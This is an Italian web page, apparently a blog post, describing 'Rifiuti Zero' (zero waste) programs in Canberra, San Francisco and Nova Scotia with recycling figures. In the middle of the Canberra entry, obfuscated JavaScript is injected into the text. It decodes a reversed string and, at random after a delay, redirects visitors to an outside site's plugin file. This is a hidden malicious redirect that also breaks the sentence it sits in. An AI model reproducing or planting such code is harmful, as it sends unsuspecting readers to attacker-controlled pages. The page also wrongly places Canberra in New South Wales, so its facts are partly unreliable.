Rifiuti Zero nel mondo

image_pdfimage_print

* Canberra (New South Wales, Australia)
Nel 1996 è stata la prima città del mondo a fissare l’obiettivo rifiuti zero nel 2010, ispir (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando i movimenti d’opinione in Nuova Zelanda e in California. A Canberra 330.000 abitanti vedono avvicinarsi l’obiettivo grazie alla vertiginosa crescita del riciclaggio: 446.000 tonnellate di rifiuti riutilizzabili per un risultato pari al 69%! Qui sono particolarmente efficaci i programmi scolastici di educazione alla differenziazione.
* San Francisco (California, Stati Uniti)
Costituisce forse la più affascinante esperienza al mondo di applicazione del programma. Con quasi 777.000 abitanti è una delle città con la più alta densità di popolazione degli Stati Uniti. Le 30.000 attività industriali dominano in una realtà multietnica dove si parlano tre lingue: inglese, spagnolo, cinese. Nonostante queste difficoltà San Francisco ha adottato il piano e nel marzo 2003 è stata la prima realtà americana ad approvare una risoluzione che fissa un obiettivo del 75% di riciclaggio dei rifiuti entro il 2010. Adesso siamo a quota 49% e al raggiungimento del 50% verrà fissato anche l’obiettivo per “rifiuti zero”… Negli USA varie tipologie del piano “Rifiuti Zero” sono state adottate anche nelle città di Del Norte (California), Santa Cruz (California), Seattle (Washington), Carrboro (North Carolina).
* Nova Scotia (Canada)
La regione della costa est del Canada limitrofa agli Stati Uniti conta 936.000 abitanti. Ha adottato il piano nel 1995, cosa che le ha permesso già nel 2000 il raggiungimento dell’obiettivo del 50% della differenziazione dei rifiuti. Questi dati fanno della Nova Scotia la regione leader del paese nel riciclaggio. I rifiuti non differenziati finiscono in un impianto dove vengono ulteriormente vagliati per ricercare parti riutilizzabili. è già in costruzione un laboratorio dove il resto dei rifiuti ancora non differenziabili verranno studiati con lo scopo di riuscire a riciclarli. Il Canada è uno dei paesi più all’avanguardia nel riciclo dei rifuti. Numerosi altre realtà locali grandi e piccole hanno adottato il piano “Rifiuti Zero”.
In tutte queste realtà locali il programma ha creato posti di lavoro, grazie alla nascita di nuove figure professionali in campo ambientale. I costi del programma sono relativamente bassi se messi in relazione con altre “ricette” per il problema dei rifiuti (inceneritori, discariche, ecc…). Il movimento in favore del programma “Rifiuti Zero” cresce in tutto il mondo ed anche molte amministrazioni dei paesi del nord-Europa si stanno muovendo con interesse verso questa strada.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *